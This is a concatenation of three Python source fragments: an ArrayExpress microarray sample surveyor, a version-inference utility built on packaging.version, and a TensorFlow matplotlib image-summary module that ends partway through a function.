    for k in ('platform_accession_code', 'platform_accession_name', 'manufacturer'):
        platform_dict[k] = experiment[k]

    return experiment_object, platform_dict
def determine_sample_accession(self, experiment_accession: str, sample_source_name: str,
                               sample_assay_name: str, filename: str) -> str:
    """Pick the sample accession code from the available AE fields.

    Either the `source` or the `assay` field usually holds the sample
    accession, but which one varies by experiment (e.g. E-MEXP-669 keeps
    it in the assay name), so this applies heuristics in order:

    1. If either field contains the filename minus its extension, use it.
    2. Accessions never contain spaces, so prefer the space-free field.
    3. Otherwise fall back to the longer field.

    The result is always prefixed with the experiment accession, since
    sample names are non-unique across ArrayExpress ("Sample 1" is a
    perfectly valid assay name).
    """
    def _prefixed(name):
        return experiment_accession + "-" + name

    # Heuristic 1: the filename often embeds part or all of the sample name.
    if isinstance(filename, str):
        base = ".".join(filename.split(".")[:-1])
        if base:
            if base in sample_source_name:
                return _prefixed(sample_source_name)
            if base in sample_assay_name:
                return _prefixed(sample_assay_name)

    # Heuristic 2: prefer whichever field is free of spaces.
    source_spaced = " " in sample_source_name
    assay_spaced = " " in sample_assay_name
    if assay_spaced and not source_spaced:
        return _prefixed(sample_source_name)
    if source_spaced and not assay_spaced:
        return _prefixed(sample_assay_name)

    # Heuristic 3: out of signals -- take the longer of the two.
    longer = (sample_source_name
              if len(sample_source_name) >= len(sample_assay_name)
              else sample_assay_name)
    return _prefixed(longer)
@staticmethod
def extract_protocol_text(protocol_text):
    """Return a flat string representation of ``protocol_text``.

    ``protocol_text`` may be a string or a list containing both strings
    and dicts, which is what the API returns sometimes (see E-MEXP-2381
    as an example)::

        [
            "Microarrays were imaged using an Agilent microarray scanner ...",
            {
                "br": null
            },
            "(Parameters: Scanning hardware = DNA Microarray Scanner BA ...)"
        ]

    Falsy input yields ''; list entries that are not strings (e.g.
    {"br": None}) are skipped; any other type is stringified.
    """
    if not protocol_text:
        return ''
    elif isinstance(protocol_text, str):
        return protocol_text.strip()
    elif isinstance(protocol_text, list):
        # Entries can be dicts like {"br": None}, so keep only the strings.
        # isinstance (rather than type ==) also accepts str subclasses.
        return " ".join(line.strip() for line in protocol_text if isinstance(line, str))
    else:
        # Not sure what would get us here, but it's not worth raising an error over.
        return str(protocol_text)
@staticmethod
def update_sample_protocol_info(existing_protocols, experiment_protocol, protocol_url):
    """Merge new experiment-level protocol entries into a sample's list.

    Compares ``experiment_protocol`` with a sample's ``existing_protocols``
    and appends any entry not already present.  Note that the ArrayExpress
    experiment-level protocol may include multiple protocol entries.

    Args:
        existing_protocols: list of dicts with 'Accession', 'Text', 'Type'
            and 'Reference' keys already attached to the sample.  Mutated
            in place.
        experiment_protocol: ArrayExpress protocol payload; entries live
            under its 'protocol' key.
        protocol_url: URL stored as the 'Reference' of any appended entry.

    Returns:
        A two-element tuple: ``existing_protocols`` (possibly updated) and
        a bool indicating whether it was updated.
    """
    if 'protocol' not in experiment_protocol:
        return (existing_protocols, False)

    is_updated = False
    # Compare each entry in the experiment protocol with the existing
    # protocols; if the entry is new, add it to existing_protocols.
    for new_protocol in experiment_protocol['protocol']:
        new_protocol_text = new_protocol.get('text', '')
        new_protocol_text = ArrayExpressSurveyor.extract_protocol_text(new_protocol_text)

        # Ignore experiment-level protocols whose accession or text
        # field is unavailable or empty.
        if (not new_protocol.get('accession', '').strip() or
                not new_protocol_text):
            continue

        new_protocol_is_found = False
        for existing_protocol in existing_protocols:
            if (new_protocol.get('accession', '') == existing_protocol['Accession']
                    and new_protocol_text == existing_protocol['Text']
                    and new_protocol.get('type', '') == existing_protocol['Type']):
                new_protocol_is_found = True
                break

        if not new_protocol_is_found:
            existing_protocols.append({
                'Accession': new_protocol['accession'],
                'Text': new_protocol_text,
                'Type': new_protocol.get('type', ''),  # in case 'type' field is unavailable
                'Reference': protocol_url
            })
            is_updated = True

    return (existing_protocols, is_updated)
def create_samples_from_api(self,
                            experiment: Experiment,
                            platform_dict: Dict
                            ) -> List[Sample]:
    """Generates a Sample item for each sample in an AE experiment.

    There are many possible data situations for a sample:

        - If the sample only has raw data available:
            - If it is on a platform that we support:
                Download this raw data and process it
            - If it is not on a platform we support:
                Don't download anything, don't process anything
        - If the sample has both raw and derived data:
            - If the raw data is on a platform we support:
                Download the raw data and process it, abandon the derived data
            - If the raw data is not on a platform we support
                Download the derived data and no-op it, abandon the raw data
        - If the sample only has derived data:
            Download the derived data and no-op it.

    See an example at: https://www.ebi.ac.uk/arrayexpress/json/v3/experiments/E-MTAB-3050/samples
    """
    created_samples = []
    samples_endpoint = SAMPLES_URL.format(experiment.accession_code)
    r = utils.requests_retry_session().get(samples_endpoint, timeout=60)
    samples = r.json()["experiment"]["sample"]

    # The SDRF is the complete metadata record on a sample/property basis.
    # We run this through our harmonizer and then attach the properties
    # to our created samples.
    SDRF_URL_TEMPLATE = "https://www.ebi.ac.uk/arrayexpress/files/{code}/{code}.sdrf.txt"
    sdrf_url = SDRF_URL_TEMPLATE.format(code=experiment.accession_code)
    sdrf_samples = harmony.parse_sdrf(sdrf_url)
    harmonized_samples = harmony.harmonize(sdrf_samples)

    # An experiment can have many samples
    for sample_data in samples:
        # For some reason, this sample has no files associated with it.
        if "file" not in sample_data or len(sample_data['file']) == 0:
            continue

        # Each sample is given an experimentally-unique title.
        flat_sample = utils.flatten(sample_data)
        title = harmony.extract_title(flat_sample)

        # A sample may actually have many sub files.
        # If there is raw data, take that.
        # If not, take the derived.
        has_raw = False
        for sub_file in sample_data['file']:
            # For ex: E-GEOD-15645
            if isinstance(sub_file['comment'], list):
                sub_file_mod = sub_file
                sub_file_mod['comment'] = sub_file['comment'][0]
            else:
                sub_file_mod = sub_file

            # Some have the 'data' field, but not the actual data
            # Ex: E-GEOD-9656
            if sub_file_mod['type'] == "data" and sub_file_mod['comment'].get('value', None) is not None:
                has_raw = True
            if 'raw' in sub_file_mod['comment'].get('value', ''):
                has_raw = True

        skip_sample = False
        for sub_file in sample_data['file']:
            # Don't get the raw data if it's only a 1-color sample.
            if 'Cy3' in str(sample_data) and 'Cy5' not in str(sample_data):
                has_raw = False

            # Skip derived data if we have it raw.
            if has_raw and "derived data" in sub_file['type']:
                continue

            download_url = None
            filename = sub_file["name"]

            # sub_file["comment"] is only a list if there's
            # more than one comment...
            comments = sub_file["comment"]
            if isinstance(comments, list):
                # Could be: "Derived ArrayExpress Data Matrix FTP
                # file" or: "ArrayExpress FTP file". If there is
                # no comment with a name including "FTP file" then
                # we don't know where to download it so we need to
                # mark this job as an error. Therefore don't catch
                # the potential exception where download_url
                # doesn't get defined.
                for comment in comments:
                    if "FTP file" in comment["name"]:
                        download_url = comment["value"]
                        break
            else:
                download_url = comments["value"]

            if not download_url:
                # BUGFIX: the accession code is not determined until after
                # this loop, so the original referenced an undefined
                # variable here; identify the file by its name instead.
                logger.error("Sample file %s did not specify a download url, skipping.",
                             filename,
                             experiment_accession_code=experiment.accession_code,
                             survey_job=self.survey_job.id,
                             sub_file=sub_file)
                skip_sample = True
                continue

            if not filename:
                # BUGFIX: same undefined-variable issue as above; there is
                # no filename to report, so log the sub_file payload only.
                logger.error("A sample file did not specify a filename, skipping.",
                             experiment_accession_code=experiment.accession_code,
                             survey_job=self.survey_job.id,
                             sub_file=sub_file)
                skip_sample = True
                continue

        if skip_sample:
            continue

        # The accession code is not a simple matter to determine.
        sample_source_name = sample_data["source"].get("name", "")
        sample_assay_name = sample_data["assay"].get("name", "")
        sample_accession_code = self.determine_sample_accession(
            experiment.accession_code,
            sample_source_name,
            sample_assay_name,
            filename)

        # Figure out the Organism for this sample
        organism_name = UNKNOWN
        for characteristic in sample_data["characteristic"]:
            if characteristic["category"].upper() == "ORGANISM":
                organism_name = characteristic["value"].upper()

        if organism_name == UNKNOWN:
            logger.error("Sample %s did not specify the organism name.",
                         sample_accession_code,
                         experiment_accession_code=experiment.accession_code,
                         survey_job=self.survey_job.id)
            organism = None
            continue
        else:
            organism = Organism.get_object_for_name(organism_name)

        # Create the sample object
        try:
            # Associate it with the experiment, but since it
            # already exists it already has original files
            # associated with it and it's already been downloaded,
            # so don't add it to created_samples.
            sample_object = Sample.objects.get(accession_code=sample_accession_code)

            # If input experiment includes new protocol information,
            # update sample's protocol_info.
            existing_protocols = sample_object.protocol_info
            protocol_info, is_updated = self.update_sample_protocol_info(
                existing_protocols,
                experiment.protocol_description,
                experiment.source_url + '/protocols'
            )
            if is_updated:
                sample_object.protocol_info = protocol_info
                # BUGFIX: was `sample_obejct.save()`, a NameError whenever
                # an existing sample's protocol info needed updating.
                sample_object.save()

            logger.debug("Sample %s already exists, skipping object creation.",
                         sample_accession_code,
                         experiment_accession_code=experiment.accession_code,
                         survey_job=self.survey_job.id)
        except Sample.DoesNotExist:
            sample_object = Sample()

            # The basics
            sample_object.source_database = "ARRAY_EXPRESS"
            sample_object.title = title
            sample_object.accession_code = sample_accession_code
            sample_object.source_archive_url = samples_endpoint
            sample_object.organism = organism
            sample_object.platform_name = platform_dict["platform_accession_name"]
            sample_object.platform_accession_code = platform_dict["platform_accession_code"]
            sample_object.manufacturer = platform_dict["manufacturer"]
            sample_object.technology = "MICROARRAY"

            protocol_info, is_updated = self.update_sample_protocol_info(
                existing_protocols=[],
                experiment_protocol=experiment.protocol_description,
                protocol_url=experiment.source_url + '/protocols'
            )
            # Do not check is_updated the first time because we must
            # save a list so we can append to it later.
            sample_object.protocol_info = protocol_info

            sample_object.save()

            # Directly assign the harmonized properties
            harmonized_sample = harmonized_samples[title]
            for key, value in harmonized_sample.items():
                setattr(sample_object, key, value)
            sample_object.save()

            sample_annotation = SampleAnnotation()
            sample_annotation.data = sample_data
            sample_annotation.sample = sample_object
            sample_annotation.is_ccdl = False
            sample_annotation.save()

            original_file = OriginalFile()
            original_file.filename = filename
            original_file.source_filename = filename
            original_file.source_url = download_url
            original_file.is_downloaded = False
            original_file.is_archive = True
            original_file.has_raw = has_raw
            original_file.save()

            original_file_sample_association = OriginalFileSampleAssociation()
            original_file_sample_association.original_file = original_file
            original_file_sample_association.sample = sample_object
            original_file_sample_association.save()

            created_samples.append(sample_object)

            logger.debug("Created " + str(sample_object),
                         experiment_accession_code=experiment.accession_code,
                         survey_job=self.survey_job.id,
                         sample=sample_object.id)

        # Create associations if they don't already exist
        ExperimentSampleAssociation.objects.get_or_create(
            experiment=experiment, sample=sample_object)
        ExperimentOrganismAssociation.objects.get_or_create(
            experiment=experiment, organism=organism)

    return created_samples
def discover_experiment_and_samples(self) -> (Experiment, List[Sample]):
    """Survey the experiment named by this survey job's key-value.

    Reads the accession code from the job's SurveyJobKeyValue, creates
    the Experiment (and platform info) from the AE API, then creates its
    samples.  Returns (None, []) when the platform is unsupported or any
    error occurs while surveying.
    """
    experiment_accession_code = (
        SurveyJobKeyValue
        .objects
        .get(survey_job_id=self.survey_job.id,
             key__exact="experiment_accession_code")
        .value
    )

    logger.info("Surveying experiment with accession code: %s.",
                experiment_accession_code,
                survey_job=self.survey_job.id)

    try:
        experiment, platform_dict = self.create_experiment_from_api(experiment_accession_code)
    except UnsupportedPlatformException:
        logger.info("Experiment was not on a supported platform, skipping.",
                    experiment_accession_code=experiment_accession_code,
                    survey_job=self.survey_job.id)
        return None, []
    except Exception:
        # BUGFIX: was a bare `except:`, which would also swallow
        # SystemExit/KeyboardInterrupt.
        logger.exception("Error occurred while surveying experiment!",
                         experiment_accession_code=experiment_accession_code)
        return None, []

    samples = self.create_samples_from_api(experiment, platform_dict)
    return experiment, samples
|
|
import operator
import itertools
from functools import reduce
import packaging.version
def find(pred, items):
    """
    Find the index of the first element in items for which pred returns
    True; None when no element satisfies pred.

    >>> find(lambda x: x > 3, range(100))
    4
    >>> find(lambda x: x < -3, range(100)) is None
    True
    """
    matching = (index for index, item in enumerate(items) if pred(item))
    return next(matching, None)
def rfind(pred, items):
    """
    Find the index of the last element in items for which pred returns
    True. Returns a negative number useful for indexing from the end
    of a list or tuple.

    >>> rfind(lambda x: x > 3, [5,4,3,2,1])
    -4
    """
    # Scan from the end; offset i in the reversed sequence maps to the
    # negative index -(i + 1) in the original.  When nothing matches,
    # offset stays None and the negation raises TypeError (as before).
    offset = None
    for i, item in enumerate(reversed(items)):
        if pred(item):
            offset = i
            break
    return -offset - 1
class SummableVersion(packaging.version.Version):
    """
    A special version that can be added to another Version.

    >>> SummableVersion('1.1') + packaging.version.Version('2.3')
    <Version('3.4')>
    """

    def __add__(self, other):
        # Add the two release tuples element-wise, zero-padding the shorter
        # one.  NOTE(review): this manipulates packaging's private `_version`
        # namedtuple; epoch/pre/post/dev components of `other` are ignored.
        result = SummableVersion('1.0')
        result._version = result._version._replace(
            release=tuple(
                itertools.starmap(
                    operator.add,
                    itertools.zip_longest(
                        self._version.release,
                        other._version.release,
                        fillvalue=0,
                    ),
                ),
            ),
        )
        # Round-trip through str() so all derived attributes are rebuilt
        # consistently from the new release tuple.
        return SummableVersion(str(result))

    def reset_less_significant(self, significant_version):
        """
        Reset to zero all version info less significant than the
        indicated version.

        >>> ver = SummableVersion('3.1.2')
        >>> ver.reset_less_significant(SummableVersion('0.1'))
        >>> str(ver)
        '3.1'
        """
        def nonzero(x):
            return x != 0

        # Locate the least-significant nonzero component of the increment;
        # everything in `self` beyond that position is zeroed out.
        version_len = len(significant_version._version.release)
        significant_pos = rfind(nonzero, significant_version._version.release)
        significant_pos = version_len + significant_pos + 1
        new_release = self._version.release[:significant_pos] + (0,) * (
            version_len - significant_pos
        )
        self._version = self._version._replace(release=new_release)
        # Re-run __init__ so cached/derived attributes match the new release.
        self.__init__(str(self))

    def as_number(self):
        """
        >>> round(SummableVersion('1.9.3').as_number(), 12)
        1.93
        """
        def combine(subver, ver):
            # Fold right-to-left so 1.9.3 becomes 1 + (9 + 3/10)/10 = 1.93.
            return subver / 10 + ver

        return reduce(combine, reversed(self._version.release))
class VersionManagement:
    """
    Version functions for RepoManager classes.

    Relies on the host class providing tag/repo accessors such as
    get_repo_tags(), get_tags(), get_parent_tags() and is_modified().
    """

    # Default version increment used when none is supplied.
    increment = '0.0.1'

    @staticmethod
    def __versions_from_tags(tags):
        # Yield only tags that parse as versions; silently skip the rest.
        for tag in tags:
            try:
                yield packaging.version.Version(tag)
            except ValueError:
                pass

    @staticmethod
    def __best_version(versions):
        # max() raises ValueError on an empty iterable; treat that as
        # "no version available" and return None.
        try:
            return max(versions)
        except ValueError:
            pass

    def get_valid_versions(self):
        """
        Return all version tags that can be represented by a Version.
        """
        return self.__versions_from_tags(tag.tag for tag in self.get_repo_tags())

    def get_tagged_version(self):
        """
        Get the version of the local working set as a Version or
        None if no viable tag exists. If the local working set is itself
        the tagged commit and the tip and there are no local
        modifications, use the tag on the parent changeset.
        """
        tags = list(self.get_tags())
        if 'tip' in tags and not self.is_modified():
            tags = self.get_parent_tags('tip')
        versions = self.__versions_from_tags(tags)
        return self.__best_version(versions)

    def get_latest_version(self):
        """
        Determine the latest version ever released of the project in
        the repo (based on tags).
        """
        return self.__best_version(self.get_valid_versions())

    def get_current_version(self, increment=None):
        """
        Return as a string the version of the current state of the
        repository -- a tagged version, if present, or the next version
        based on prior tagged releases (suffixed with '.dev0').
        """
        ver = (
            self.get_tagged_version() or str(self.get_next_version(increment)) + '.dev0'
        )
        return str(ver)

    def get_next_version(self, increment=None):
        """
        Return the next version based on prior tagged releases.
        """
        increment = increment or self.increment
        return self.infer_next_version(self.get_latest_version(), increment)

    @staticmethod
    def infer_next_version(last_version, increment):
        """
        Given a simple application version (as a Version),
        and an increment (1.0, 0.1, or 0.0.1), guess the next version.

        Set up a shorthand for examples

        >>> def VM_infer(*params):
        ...     return str(VersionManagement.infer_next_version(*params))

        >>> VM_infer('3.2', '0.0.1')
        '3.2.1'
        >>> VM_infer(packaging.version.Version('3.2'), '0.0.1')
        '3.2.1'
        >>> VM_infer('3.2.3', '0.1')
        '3.3'
        >>> VM_infer('3.1.2', '1.0')
        '4.0'

        Subversions never increment parent versions

        >>> VM_infer('3.0.9', '0.0.1')
        '3.0.10'

        If it's a prerelease version, just remove the prerelease.

        >>> VM_infer('3.1a1', '0.0.1')
        '3.1'

        If there is no last version, use the increment itself

        >>> VM_infer(None, '0.1')
        '0.1'
        """
        if last_version is None:
            return increment
        last_version = SummableVersion(str(last_version))
        if last_version.is_prerelease:
            # A prerelease already names the next version; strip the
            # pre/dev markers instead of incrementing.
            last_version._version = last_version._version._replace(
                pre=None,
                dev=None,
            )
            return str(last_version)
        increment = SummableVersion(increment)
        # Renamed from `sum`, which shadowed the builtin.
        next_version = last_version + increment
        next_version.reset_less_significant(increment)
        return next_version
|
|
# Lint as: python2, python3
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for generating image summaries using matplotlib."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import traceback
import REDACTED.transformer_lingvo.lingvo.compat as tf
from REDACTED.transformer_lingvo.lingvo.core import py_utils
from matplotlib.backends import backend_agg
import matplotlib.gridspec as gridspec
import matplotlib.pyplot as plt
import numpy as np
import six
from six.moves import range
from six.moves import zip
def ToUnicode(text):
  """Returns `text` as a unicode string, decoding UTF-8 bytes if necessary."""
  if isinstance(text, six.text_type):
    return text
  return six.ensure_text(text, 'utf-8')
def AddPlot(unused_fig,
            axes,
            data,
            title=u'',
            xlabel=u'',
            ylabel=u'',
            fontsize='small',
            xlim=None,
            ylim=None,
            suppress_xticks=False,
            suppress_yticks=False):
  """Draws `data` as a line plot on `axes` and applies the decorations."""
  axes.plot(data)
  for set_text, text in ((axes.set_title, title),
                         (axes.set_xlabel, xlabel),
                         (axes.set_ylabel, ylabel)):
    set_text(ToUnicode(text), size=fontsize)
  if xlim:
    axes.set_xlim(xlim)
  if ylim:
    axes.set_ylim(ylim)
  # An empty tick list hides that axis' ticks entirely.
  if suppress_xticks:
    axes.set_xticks([])
  if suppress_yticks:
    axes.set_yticks([])
def AddImage(fig,
             axes,
             data,
             cmap='bone_r',
             clim=None,
             show_colorbar=True,
             title=u'',
             xlabel=u'',
             ylabel=u'',
             fontsize='small',
             origin='lower',
             suppress_xticks=False,
             suppress_yticks=False,
             aspect='auto',
             vmin=None,
             vmax=None):
  """Renders `data` with imshow on `axes`, with optional colorbar and clim."""
  image = axes.imshow(
      data,
      cmap=cmap,
      origin=origin,
      aspect=aspect,
      interpolation='nearest',
      vmin=vmin,
      vmax=vmax)
  if show_colorbar:
    fig.colorbar(image)
  if clim is not None:
    image.set_clim(clim)
  for set_text, text in ((axes.set_title, title),
                         (axes.set_xlabel, xlabel),
                         (axes.set_ylabel, ylabel)):
    set_text(ToUnicode(text), size=fontsize)
  # An empty tick list hides that axis' ticks entirely.
  if suppress_xticks:
    axes.set_xticks([])
  if suppress_yticks:
    axes.set_yticks([])
def AddScatterPlot(unused_fig,
                   axes,
                   xs,
                   ys,
                   title=u'',
                   xlabel=u'',
                   ylabel=u'',
                   fontsize='small',
                   xlim=None,
                   ylim=None,
                   suppress_xticks=False,
                   suppress_yticks=False,
                   **kwargs):
  """Draws a scatter plot of (xs, ys) on `axes`; supports 3D via 'zs'/'zlim'."""
  # 'zlim' only makes sense for 3D axes and must not be forwarded to
  # scatter(), so pop it here and apply it when set.
  zlim = kwargs.pop('zlim', None)
  if zlim:
    axes.set_zlim(zlim)
  axes.scatter(xs, ys, **kwargs)
  for set_text, text in ((axes.set_title, title),
                         (axes.set_xlabel, xlabel),
                         (axes.set_ylabel, ylabel)):
    set_text(ToUnicode(text), size=fontsize)
  if xlim:
    axes.set_xlim(xlim)
  if ylim:
    axes.set_ylim(ylim)
  if suppress_xticks:
    axes.set_xticks([])
  if suppress_yticks:
    axes.set_yticks([])
# Bookkeeping for one subplot: the tensors to realize and the function used
# to render them onto the subplot's axes.
_SubplotMetadata = collections.namedtuple('_SubplotMetadata',
                                          ['tensor_list', 'plot_func'])
class MatplotlibFigureSummary(object):
  """Helper to minimize boilerplate in creating a summary with several subplots.

  Typical usage::

      >>> fig_helper = plot.MatplotlibFigureSummary(
      ...     'summary_name', shared_subplot_kwargs={'xlabel': 'Time'})
      >>> fig_helper.AddSubplot([tensor1], title='tensor1')
      >>> fig_helper.AddSubplot([tensor2], title='tensor2', ylabel='Frequency')
      >>> image_summary = fig_helper.Finalize()

  Can also be used as a context manager if the caller does not need the return
  value from Finalize(), e.g.

      >>> with plot.MatplotlibFigureSummary('figure') as fig:
      ...   fig.AddSubplot([tensor1])
  """

  def __init__(self,
               name,
               figsize=(8, 10),
               max_outputs=3,
               subplot_grid_shape=None,
               gridspec_kwargs=None,
               plot_func=AddImage,
               shared_subplot_kwargs=None):
    """Creates a new MatplotlibFigureSummary object.

    Args:
      name: A string name for the generated summary.
      figsize: A 2D tuple containing the overall figure (width, height)
        dimensions in inches.
      max_outputs: The maximum number of images to generate.
      subplot_grid_shape: A 2D tuple containing the height and width dimensions
        of the subplot grid. height * width must be >= the number of subplots.
        Defaults to (num_subplots, 1), i.e. a vertical stack of plots.
      gridspec_kwargs: A dict of extra keyword args to use when initializing the
        figure's gridspec, as supported by matplotlib.gridspec.GridSpec.
      plot_func: A function shared across all subplots used to populate a single
        subplot. See the docstring for AddSubplot for details.
      shared_subplot_kwargs: A dict of extra keyword args to pass to the plot
        function for all subplots. This is useful for specifying properties
        such as 'clim' which should be consistent across all subplots.
    """
    self._name = name
    self._figsize = figsize
    self._max_outputs = max_outputs
    self._subplot_grid_shape = subplot_grid_shape
    self._gridspec_kwargs = gridspec_kwargs if gridspec_kwargs else {}
    self._plot_func = plot_func
    self._shared_subplot_kwargs = (
        shared_subplot_kwargs if shared_subplot_kwargs else {})
    # List of _SubplotMetadata, one per AddSubplot call, in call order.
    self._subplots = []

  def __enter__(self):
    return self

  def __exit__(self, unused_exc_type, unused_exc_value, unused_tb):
    # NOTE: the image summary returned by Finalize() is discarded here;
    # use the non-context-manager form if the return value is needed.
    self.Finalize()

  def AddSubplot(self, tensor_list, plot_func=None, **kwargs):
    r"""Adds a subplot from tensors using plot_fun to populate the subplot axes.

    Args:
      tensor_list: A list of tensors to be realized as numpy arrays and passed
        as arguments to plot_func. The first dimension of each tensor in the
        list corresponds to batch, and must be the same size for each tensor.
      plot_func: A function with signature f(fig, axes, data1, data2, ...,
        datan, \*\*kwargs) that will be called with the realized data from
        tensor_list to plot data on axes in fig. This function is called
        independently on each element of the batch. Overrides plot_func passed
        in to the constructor.
      **kwargs: A dict of additional non-tensor keyword args to pass to
        plot_func when generating the plot, overridding any
        shared_subplot_kwargs. Useful for e.g. specifying a subplot's title.
    """
    # Per-subplot kwargs take precedence over the shared ones.
    merged_kwargs = dict(self._shared_subplot_kwargs, **kwargs)
    if plot_func is None:
      plot_func = self._plot_func
    # Bind the kwargs now so only (fig, axes, *data) remain at plot time.
    plot_func = functools.partial(plot_func, **merged_kwargs)
    self._subplots.append(_SubplotMetadata(tensor_list, plot_func))

  def Finalize(self):
    """Finishes creation of the overall figure, returning the image summary."""
    subplot_grid_shape = self._subplot_grid_shape
    if subplot_grid_shape is None:
      subplot_grid_shape = (len(self._subplots), 1)

    # AddMatplotlibFigureSummary (due to restrictions of py_func) only supports
    # flattened list of tensors so we must do some bookkeeping to maintain a
    # mapping from _SubplotMetadata object to flattened_tensors.
    subplot_slices = []
    flattened_tensors = []
    for subplot in self._subplots:
      start = len(flattened_tensors)
      subplot_slices.append((start, start + len(subplot.tensor_list)))
      flattened_tensors.extend(subplot.tensor_list)

    def PlotFunc(fig, *numpy_data_list):
      # Runs inside py_func: lay out the grid and dispatch each subplot's
      # slice of the realized numpy data to its plot function.
      gs = gridspec.GridSpec(*subplot_grid_shape, **self._gridspec_kwargs)
      for n, subplot in enumerate(self._subplots):
        axes = fig.add_subplot(gs[n])
        start, end = subplot_slices[n]
        subplot_data = numpy_data_list[start:end]
        subplot.plot_func(fig, axes, *subplot_data)

    func = functools.partial(_RenderMatplotlibFigures, self._figsize,
                             self._max_outputs, PlotFunc)
    batch_sizes = [tf.shape(t)[0] for t in flattened_tensors]
    num_tensors = len(flattened_tensors)
    # All tensors must share the same leading (batch) dimension; assert
    # this at graph-execution time before rendering.
    with tf.control_dependencies([
        tf.assert_equal(
            batch_sizes, [batch_sizes[0]] * num_tensors, summarize=num_tensors)
    ]):
      rendered = tf.py_func(
          func, flattened_tensors, tf.uint8, name='RenderMatplotlibFigures')
    return tf.summary.image(self._name, rendered, max_outputs=self._max_outputs)
def _RenderOneMatplotlibFigure(fig, plot_func, *numpy_data_list):
  """Draws one figure with `plot_func` and returns it as an HxWx3 uint8 array."""
  fig.clear()
  plot_func(fig, *numpy_data_list)
  fig.canvas.draw()
  # get_width_height() returns (width, height); the RGB buffer is row-major.
  width, height = fig.canvas.get_width_height()
  flat_rgb = np.frombuffer(fig.canvas.tostring_rgb(), dtype=np.uint8)
  return flat_rgb.reshape(height, width, 3)
def _RenderMatplotlibFigures(figsize, max_outputs, plot_func, *numpy_data_list):
  r"""Renders a figure containing several subplots using matplotlib.

  This is an internal implementation detail of MatplotlibFigureSummary.Finalize
  and should not be called directly.

  The unconventional function signature is used to work around the behavior of
  `tf.py_func` which always passes in different tensors as positional arguments.

  Args:
    figsize: A 2D tuple containing the overall figure (width, height) dimensions
      in inches.
    max_outputs: The maximum number of images to generate.
    plot_func: A function with signature f(fig, data1, data2, ..., datan) that
      will be called with \*numpy_data_list to plot data in fig.
    *numpy_data_list: A list of numpy matrices to plot specified as separate
      arguments.

  Returns:
    A numpy 4D array of type np.uint8 which can be used to generate a
    `tf.math.image_summary` when converted to a tf tensor.
  """
  batch_size = numpy_data_list[0].shape[0]
  max_outputs = min(max_outputs, batch_size)
  images = []
  # Use plt.Figure instead of plt.figure to avoid a memory leak (matplotlib
  # keeps global references to every figure created with plt.figure). When not
  # using plt.figure we have to create a canvas manually.
  fig = plt.Figure(figsize=figsize, dpi=100, facecolor='white')
  backend_agg.FigureCanvasAgg(fig)
  for b in range(max_outputs):
    # Slice batch element b out of every input array; the same figure is
    # cleared and reused for each element.
    data = [numpy_data[b] for numpy_data in numpy_data_list]
    try:
      images.append(_RenderOneMatplotlibFigure(fig, plot_func, *data))
    except Exception as e:  # pylint: disable=broad-except
      # A rendering failure for one element is logged but must not fail
      # the whole summary op.
      tf.logging.warning('Error rendering example %d using matplotlib: %s\n%s',
                         b, e, traceback.format_exc())
    if len(images) == max_outputs:
      break
  plt.close(fig)
  # Pad with dummy black images in case there were too many rendering errors.
  while len(images) < max_outputs:
    image_shape = (1, 1, 1)
    if images:
      image_shape = images[0].shape
    images.append(np.ones(image_shape, dtype=np.uint8))
  return np.array(images)
def FigureToSummary(name, fig):
  """Create tf.Summary proto from matplotlib.figure.Figure.

  Args:
    name: Summary name.
    fig: A matplotlib figure object.

  Returns:
    A `tf.Summary` proto containing the figure rendered to an image.
  """
  canvas = backend_agg.FigureCanvasAgg(fig)
  fig.canvas.draw()
  width, height = fig.canvas.get_width_height()
  # Render the figure to an in-memory PNG.
  png_buffer = six.BytesIO()
  canvas.print_figure(png_buffer)
  summary_image = tf.Summary.Image(
      height=height,
      width=width,
      colorspace=3,
      encoded_image_string=png_buffer.getvalue())
  return tf.Summary(
      value=[tf.Summary.Value(tag='%s/image' % name, image=summary_image)])
def Image(name, figsize, image, setter=None, **kwargs):
  """Plot an image in numpy and generates tf.Summary proto for it.

  Args:
    name: Image summary name.
    figsize: A 2D tuple containing the overall figure (width, height) dimensions
      in inches.
    image: A 2D/3D numpy array in the format accepted by pyplot.imshow.
    setter: A callable taking (fig, axes). Useful to fine-tune layout of the
      figure, xlabel, xticks, etc.
    **kwargs: Additional arguments to AddImage.

  Returns:
    A `tf.Summary` proto containing one image visualizing `image`.
  """
  assert image.ndim in (2, 3), '%s' % image.shape
  figure = plt.Figure(figsize=figsize, dpi=100, facecolor='white')
  axes = figure.add_subplot(1, 1, 1)
  # Unlike AddImage's defaults, default to no colorbar and 'upper' origin
  # unless the caller says otherwise.
  kwargs.setdefault('show_colorbar', False)
  kwargs.setdefault('origin', 'upper')
  AddImage(figure, axes, image, **kwargs)
  if setter:
    setter(figure, axes)
  return FigureToSummary(name, figure)
def Scatter(name, figsize, xs, ys, setter=None, **kwargs):
  """Plot a scatter plot in numpy and generates tf.Summary proto for it.

  Args:
    name: Scatter plot summary name.
    figsize: A 2D tuple containing the overall figure (width, height) dimensions
      in inches.
    xs: A set of x points to plot.
    ys: A set of y points to plot.
    setter: A callable taking (fig, axes). Useful to fine-tune layout of the
      figure, xlabel, xticks, etc.
    **kwargs: Additional arguments to AddScatterPlot.

  Returns:
    A `tf.Summary` proto containing one image visualizing the scatter plot.
  """
  figure = plt.Figure(figsize=figsize, dpi=100, facecolor='white')
  # When z data is provided, switch to a 3d projection.  This requires the
  # mplot3d toolkit (e.g., from mpl_toolkits import mplot3d) to be
  # registered in the program.
  if 'zs' in kwargs:
    axes = figure.add_subplot(111, projection='3d')
  else:
    axes = figure.add_subplot(1, 1, 1)
  AddScatterPlot(figure, axes, xs, ys, **kwargs)
  if setter:
    setter(figure, axes)
  return FigureToSummary(name, figure)
# A "matrix" summary is rendered exactly like an image summary of the data.
Matrix = Image  # pylint: disable=invalid-name
def Curve(name, figsize, xs, ys, setter=None, **kwargs):
  """Plot curve(s) to a `tf.Summary` proto.

  Args:
    name: Image summary name.
    figsize: A 2D tuple containing the overall figure (width, height) dimensions
      in inches.
    xs: x values for matplotlib.pyplot.plot.
